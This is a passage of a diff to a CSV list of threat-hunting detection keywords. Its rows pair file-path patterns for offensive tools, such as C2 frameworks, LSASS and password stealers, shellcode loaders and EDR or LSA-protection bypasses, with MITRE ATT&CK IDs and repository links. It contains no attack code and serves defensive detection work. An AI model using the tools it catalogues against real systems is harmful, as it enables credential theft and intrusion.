Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\SimpleLoader.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\sitadel.log*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" 
-"*\SMB_RPC\*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*\smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","228","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" -"*\sniff.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\slinky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\SMB_RPC\*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*\sniff.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*\spellbound-main*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*\spellgen.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*\spellstager.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" -"*\SpoofCmdLine\TheThing*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*\spider_plus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\SpoofCmdLine\TheThing*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*\spooler.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\SprayAD.cna*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - 
TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" "*\SprayAD.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*\SQLInfoDumps*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\SQLInfoDumps*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*\SQLRecon*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" "*\stager.ps1*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*\start_campaign.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*\StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*\StolenPasswords.txt*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*\StolenPasswords.txt*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*\Suborner.sln*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","0","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" -"*\Supernova.exe*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*\Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*\Supershell\rssh\pkg\*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*\Supershell\rssh\pkg\*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*\Supernova.exe*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*\Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*\Supershell\rssh\pkg\*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*\Supershell\rssh\pkg\*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*\systemic.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*\TakeMyRDP*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*\TASKSHELL.EXE*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a 
binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" +"*\teams_localdb.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\teamserver-win.zip*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*\teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - 
T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" -"*\temp\dump.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*\Temp\dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*\teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*\temp\dump.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\Temp\dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*\temp\hollow.dll*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" -"*\temp\pwned.trx*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*\Temp\Reaper.exe*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*\Temp\RTCore64.sys*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" -"*\Temp\whoami.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*\temp\pwned.trx*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\Temp\Reaper.exe*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*\Temp\RTCore64.sys*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*\Temp\whoami.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\tests\beacon64.bin*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*\TGSThief\*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","0","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" -"*\the-backdoor-factory\*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*\ThemeBleed.exe *","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","27","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" 